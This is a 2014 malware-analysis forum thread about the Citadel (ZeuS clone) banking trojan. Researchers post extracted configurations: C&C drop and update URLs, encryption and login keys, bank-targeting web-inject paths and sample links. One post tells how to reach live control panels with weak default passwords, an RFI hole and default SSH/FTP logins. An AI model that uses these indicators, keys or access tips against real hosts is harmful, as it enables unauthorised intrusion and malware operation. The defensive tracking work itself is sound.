A forum for reverse engineering, OS internals and malware analysis 

Citadel (Zeus clone)

Forum for analysis and discussion about malware.

Re: Citadel (Zeus clone)

 #21844  by Xylitol
 Thu Jan 02, 2014 3:01 pm
Citadel targeting wellsfargo
Code: Select all
Drop: hxtp://78.47.42.220/gate.php
Update: hxtp://78.47.42.220/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: CD F0 70 A3 F3 C2 2B 44 15 1B A3 3E 73 06 8E B4
https://www.virustotal.com/en/file/0f8e ... 388674760/
https://zeustracker.abuse.ch/monitor.ph ... .47.42.220
Attachments
infected
(675.75 KiB) Downloaded 57 times

Re: Citadel (Zeus clone)

 #21845  by coldy
 Thu Jan 02, 2014 3:46 pm
patriq wrote:Worked on a Citadel C&C from ZeuS Tracker
Code: Select all
Panel:
http://173.242.112.135/office/obi/server/cp.php?m=login
Script was running:

user_execute hxtp://142.0.36.226/office/nh.exe
Several Citadel 1.3.5.1 and ZeuS 2.x panels:
Code: Select all
hXXp://173.242.112.135/office/_XXX_/server/cp.php?m=login
hXXp://142.0.36.226/office/_XXX_/server/cp.php?m=login
Change _XXX_ to directory name (directory listing is enabled). Credentials are *admin* or *user* with very simple password. SSH, FTP access enabled also with default user and simple password (probably hacked machine). Most of these botnets seems to be dead by now (if this is your merit - thx guys :)) but some seems to be alive (although abandoned).

Re: Citadel (Zeus clone)

 #21847  by patriq
 Thu Jan 02, 2014 8:04 pm
Several Citadel 1.3.5.1 and ZeuS 2.x panels:
Code: Select all
hXXp://173.242.112.135/office/_XXX_/server/cp.php?m=login
hXXp://142.0.36.226/office/_XXX_/server/cp.php?m=login
Change _XXX_ to directory name (directory listing is enabled). Credentials are *admin* or *user* with very simple password. SSH, FTP access enabled also with default user and simple password (probably hacked machine). Most of these botnets seems to be dead by now (if this is your merit - thx guys :)) but some seems to be alive (although abandoned).
Yea these are dead and removed from ZeuS Tracker.
https://zeustracker.abuse.ch/monitor.ph ... 42.112.135

My work on it:
http://protectyournet.blogspot.com/2013 ... 12135.html

And I'm not the only researcher looking at those, there is RFI vuln on Citadel panels (xylitol is the shit) and by the time my lazy butt has a look at the panel, there is already a shell or the password is easily bruted.

Re: Citadel (Zeus clone)

 #21859  by Xylitol
 Sat Jan 04, 2014 1:21 pm
Some samples (79) of the previous links: http://www.kernelmode.info/forum/viewto ... 130#p21811
And some new:
https://www.virustotal.com/en/file/76ec ... /analysis/
https://www.virustotal.com/en/file/2629 ... /analysis/
https://www.virustotal.com/en/file/c526 ... /analysis/
https://www.virustotal.com/en/file/51c2 ... /analysis/
https://www.virustotal.com/en/file/ed57 ... /analysis/
https://www.virustotal.com/en/file/c417 ... /analysis/
https://www.virustotal.com/en/file/1e84 ... /analysis/
https://www.virustotal.com/en/file/e196 ... /analysis/
https://www.virustotal.com/en/file/7ee2 ... /analysis/
https://www.virustotal.com/en/file/8b6b ... /analysis/
https://www.virustotal.com/en/file/623b ... /analysis/
https://www.virustotal.com/en/file/5427 ... /analysis/
https://www.virustotal.com/en/file/e3ed ... 388578507/
https://www.virustotal.com/en/file/34f6 ... /analysis/
https://www.virustotal.com/en/file/01d1 ... /analysis/
https://www.virustotal.com/en/file/76ec ... /analysis/
https://www.virustotal.com/en/file/2629 ... /analysis/
https://www.virustotal.com/en/file/c526 ... /analysis/
https://www.virustotal.com/en/file/51c2 ... /analysis/
https://www.virustotal.com/en/file/ed57 ... /analysis/
https://www.virustotal.com/en/file/c417 ... /analysis/
https://www.virustotal.com/en/file/5ef5 ... /analysis/
https://www.virustotal.com/en/file/c5d0 ... /analysis/
https://www.virustotal.com/en/file/b84a ... /analysis/
https://www.virustotal.com/en/file/4c02 ... 388839135/
Attachments
infected
(5 MiB) Downloaded 93 times
infected
(5 MiB) Downloaded 94 times
infected
(5 MiB) Downloaded 93 times
infected
(2.21 MiB) Downloaded 96 times

Re: Citadel (Zeus clone)

 #21891  by Xylitol
 Tue Jan 07, 2014 3:44 pm
Code: Select all
Drop: hxtp://69.73.171.10/~chinagar/wp-hd/gate.php
Update: hxtp://69.73.171.10/~chinagar/wp-hd/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: AF 41 62 7F 45 1C 4A D2 A4 06 A7 7E BC B7 17 4F
https://zeustracker.abuse.ch/monitor.ph ... .73.171.10
Targeting wellsfargo
Attachments
infected
(229.34 KiB) Downloaded 77 times

Re: Citadel (Zeus clone)

 #21946  by Xylitol
 Tue Jan 14, 2014 2:27 pm
Code: Select all
Drop: hxtp://ttbkvietnam.com/media/system/images/gate.php
Update: hxtp://ttbkvietnam.com/media/system/images/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: B9 C5 54 C3 DD 77 02 B8 D8 76 46 0D 18 F8 4B 2F
https://zeustracker.abuse.ch/monitor.ph ... ietnam.com
Targeting wellsfargo
Attachments
infected
(719.14 KiB) Downloaded 69 times

Re: Citadel (Zeus clone)

 #21960  by tildedennis
 Wed Jan 15, 2014 9:33 pm
Code: Select all
Sample: https://www.virustotal.com/en/file/f314b99a74f27b1f09bb17adda5ebcb3a2f64dccab5a35f1e685cda480cec3bf/analysis/
Version: 1.3.5.1
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Config URL: http://dienmayhanoi.net/css/img/bg/file.php|file=config.dll
Config attached.
Attachments
infected
(51.24 KiB) Downloaded 62 times

Re: Citadel (Zeus clone)

 #21996  by Xylitol
 Sun Jan 19, 2014 10:14 am
37.143.15.235 (not on abuse.ch) - https://www.virustotal.com/en/file/2994 ... 390127100/:
Code: Select all
   "_id" : ObjectId("52db070d9314c3553e000109"),
    "zbotscan" : {
        "zbotscan" : {
            "data" : {
                "injected_process" : {
                    "xor_key" : "1819896933",
                    "executable" : "Ento\\yndi.exe",
                    "comm_rc4_key_plaintext" : "0cfcb097d33e9432e73c670bf3f00e761191d746547ab62932c544153756d0ef8e2a2dfd0aec159b5dd214d92bb6773b296c699198d085743f008b50479f0ae2b22ef17b6fffcdf6f9c4fb5d0152a70ace97a22f9d143ba93b51adab9e58f2a33a384f4bc988703fb1350da2cd21c16a19077b819b7c17642f8cbccce5800c51abf648d77b6ab512c0859a8cdeeb63a716b324e61fc287db12892fdeea0f5d594d61714df294f7cd655eac36837558220b4612bc707e8e6dbcc192bf2866e6b10de6c95c36b7d565d126b34acc87e31ae85c9d17050ee984f833a4e5ae96a057e290eba4f51e11d14322bf26da60f95bd6b0ce70c8d4424441677d78fe84ae66",
                    "aes_key" : "817BC1CB7434FDEA374C9F1B2939B09B",
                    "config_rc4_keystream_plaintext" : "5bab1f0e45924076dd5a801ee33112642dec9bd9775cf67a1b5e7eff9e0405b122a7027153df1d578d6dcc2caa6660379f36c135e60ece077af72659ed81aef70728dd2ee042b3b6e4ad83d09b617b569618c080794bf2ae59e11c651e6cc732326bb045607084a7bc9ca0a256b7251f87b0bd4eb58bb6cee5738dbdd46adadd4e3b98877d0392962fa3c9973f5d2f840fefacd12138f07deac1d20209d0caf084fbc87752a232dab22058ab237c4beb16d64ccd69bad42b9d1f33993c86895aeb64be53ca190af498d931296e3d41908a240e9be2e7fbcb67f04761f3d188d7c517f44b654036e0464a3c951208febfff260774ae01fc9111a159fbb1e818c5",
                    "malware_zbot" : "CITADEL",
                    "process_name" : "explorer.exe",
                    "mutant_key" : "2037803097",
                    "computer_identifier" : "ACME-4FA2512DC9_7875768F8465CD6E",
                    "aes_xor_key" : "FCA4C13246F5C8ABD0C5CFDC7350AB42",
                    "process_id" : 1492,
                    "process_address" : "12320768",
                    "login_key" : "C1F20D2340B519056A7D89B7DF4B0FFF",
                    "urls" : [ 
                        "http://37.143.15.235/file.php|file=config.dll"
                    ],
                    "zbot_version" : " 1.3.5.1",
                    "registry" : "{'Value3': 'Uxyqfu', 'key_path': 'HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Ogom', 'Value1': 'Hykuexu', 'Value2': 'Avcyi'}"
                }
            },
            "config" : {}
        }
    }

https://zeustracker.abuse.ch/monitor.ph ... ohobase.ru - https://www.virustotal.com/en/file/d07f ... 390127145/:
Code: Select all
   "_id" : ObjectId("52db12619314c367de00011a"),
    "zbotscan" : {
        "zbotscan" : {
            "data" : {
                "injected_process" : {
                    "xor_key" : "1652124020",
                    "executable" : "Faur\\oxly.exe",
                    "comm_rc4_key_plaintext" : "320df73a96d769b81e7fd3d18633216ba2917bdd505a53ca6584aeea4121643e429c113ff21a86e7cbe1b12c22b41a75002033799436414153373595a1b883ef6092bd1588564d9b4c8f1360c96a2ebc297665082bf67640b08306c910d2af6516f379576d14cee8b9788507c5f7e846dea47cbe6e1f3930bb350153f8a01b47232d969dc12c4e7458c4e37ef5aa51df81a7a68e0408d04ab509de7c400c15d5eec2ea5f2503a4646702b68fafc06bd0c3ca4711abffb79a7b3ad89febd5ad1afae47354efbfdc36ec647f0c2480c7ab305ba01efbcc43de90e7e94d85e3e2174e0b9f9c665cf333974a598c7ddaf6b454f1f41fadf0fc03287081d3b168a984",
                    "aes_key" : "33F1D73161F580D26BB87027AB018533",
                    "config_rc4_keystream_plaintext" : "11c0467dc64c8680a9f0b06e59539a8f9db632dc90d5a16b253d28099ecf4e1def4011e28367494696932793b54b68d87f5ab8154dd156b0f680005e3974a44a52a2ff73fd273fef361ee617e3333a752951b57745a89205955694ad70788f0718100e6a54a136995512f19dffca043e98f21c83048602f63b7a6dd6c2d0af5f16d981ee7d1fd58c849f7328a08969df434a5000c5e4a2c61a0d0a66002a626d0f28bd8a21ea79e0a3f8cbebf35043b66622b42531a471cd2b30b66faf42c33a61c74b362e5bc90bbde1ef391c8f7ad40bf1c0ced3d8d42665f9e12edfe2c61ffc62e5af57b2f5d947cd0b7e0e94599b828b7e3119bab1fca6b1e08ec36eeebb",
                    "malware_zbot" : "CITADEL",
                    "process_name" : "explorer.exe",
                    "mutant_key" : "1902213458",
                    "computer_identifier" : "ACME-4FA2512DC9_7875768F8465CD6E",
                    "aes_xor_key" : "FCA4C13246F5C8ABD0C5CFDC7350AB42",
                    "process_id" : 1492,
                    "process_address" : "12320768",
                    "login_key" : "C1F20D2340B519056A7D89B7DF4B0FFF",
                    "urls" : [ 
                        "http://hohohobase.ru/01net/file.php|file=config.dll", 
                        "http://hohohobase.ru/01net/file.php|file=config.dll"
                    ],
                    "zbot_version" : " 1.3.5.1",
                    "registry" : "{'Value3': 'Zeaksoihg', 'key_path': 'HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Fecom', 'Value1': 'Avart', 'Value2': 'Sacyxi'}"
                }
            },
            "config" : {}
        }
    }
Same actor as http://www.kernelmode.info/forum/viewto ... 120#p21692
WebInjs:
Code: Select all
hohohobase.ru/desjardinsadmin/index.php
hohohobase.ru/scotiaadmin/index.php
hohohobase.ru/cibcadmin/index.php
hohohobase.ru/bmoadmin_/index.php
hohohobase.ru/rbcadmin/index.php
hohohobase.ru/bncadmin/index.php
hohohobase.ru/tdadmin/index.php
hohohobase.ru/pcadmin/index.php
hohohobase.ru/bmoadmin/index.php
https://zeustracker.abuse.ch/monitor.ph ... e22.flu.cc - https://www.virustotal.com/en/file/f22f ... 390127213/:
Code: Select all
     "_id" : ObjectId("52d6bb789314c31cdc0001a5"),
    "zbotscan" : {
        "zbotscan" : {
            "data" : {
                "injected_process" : {
                    "xor_key" : "0",
                    "executable" : "Ikomyw\\evoz.exe",
                    "comm_rc4_key_plaintext" : "65793aee1750e178c32a5ca7897f13e3577bdabe758829ad4ea691a260d1f0189905c6edae9d4423f429047f395907090435e8728a7155d81845e0861383d494489c7aa4788ccfe0f7202d68cd3b7484bfa1baf3cad5bfc3144687d638852e106428172003a70eb6c09ab0da94a9d54dbb73186e000b5e54e6901ba5dd2cbbebcfd3615e8e446b0ce5f2fdb54dda32601c8f9ebc980f09b2cccb3d177e3f88c01bef3e45a46357e16b31f3cbadb696436a245be52ff0f6bfeec4fe44eac82a708bd979a1c7300a837aacf757d7d0812f741a5242582e34ef3e4ff46b37689d36b962ff61c627ece40809b197a89bf5936d495d0325478e14c22bf279aaaf423f",
                    "aes_key" : "661345D885279167D130E3B505F3E6B9",
                    "config_rc4_keystream_plaintext" : "a33fee60b867d36c47e286bfa67b96571899ab991e9f46def31d12b249c747a2e4c10147b5108c65dd305b5a6dfb7628bedb68d957c006d67fac033061efa15b915c97fcd27866d102c96eac3e130bb156363f6198547fcf6ce998dc0f4bbe2274ec880fb79309fac881ef971cc5872b717a33d5273b1fce8fbae1e033b2cc64eb064a0cea922c755bd174c4c30381e1a576a751380004ffb38c157986f9a6ef94f158ea3270345c9ca244f965252abe08c6bc2c37a95ab3ab2f82f72ba8927428d58ddacafc1b460b5d27cd9b41737fcef4de7123645dbdf6e00f36828b6323bf3d48453ad0293388fe4e4ae1f065e514041e4cee199ef485681114a489b32e",
                    "malware_zbot" : "CITADEL",
                    "process_name" : "explorer.exe",
                    "mutant_key" : "1700949061",
                    "computer_identifier" : "ACME-4FA2512DC9_7875768F8465CD6E",
                    "aes_xor_key" : "FCA4C13246F5C8ABD0C5CFDC7350AB42",
                    "process_id" : 1492,
                    "process_address" : "12320768",
                    "login_key" : "C1F20D2340B519056A7D89B7DF4B0FFF",
                    "urls" : [ 
                        "http://kane22.flu.cc/bella/file.php|file=config.dll", 
                        "http://kane22.flu.cc/bella/file.php|file=config.dll"
                    ],
                    "zbot_version" : " 1.3.5.1",
                    "registry" : "{'Value3': 'Oxydwyap', 'key_path': 'HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Adev', 'Value1': 'Hagof', 'Value2': 'Azaq'}"
                }
            },
            "config" : {}
        }
    }
Attachments
infected
(141.32 KiB) Downloaded 71 times
infected
(296.39 KiB) Downloaded 70 times
infected
(382.22 KiB) Downloaded 70 times

Re: Citadel (Zeus clone)

 #22026  by Xylitol
 Wed Jan 22, 2014 12:28 pm
Targeting google, facebook, paypal, wellsfargot, americanexpress, discover.
Code: Select all
Drop: hxtp://http://peccenter.com/tmp/redir.php
Update: hxtp://92.53.120.96/redrum/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: A8 BB 1A 1A 9C E7 C8 CA 6B EC 72 6F 58 84 87 62
webinject:
Code: Select all
https://appollastreet.com/nccvbv/
https://appollastreet.com/figrab/
Image
Image
https://zeustracker.abuse.ch/monitor.ph ... .53.120.96
https://www.virustotal.com/en/file/192c ... 390393696/
Attachments
infected
(271.32 KiB) Downloaded 82 times
  • 1
  • 13
  • 14
  • 15
  • 16
  • 17
  • 20
 Return to “Malware”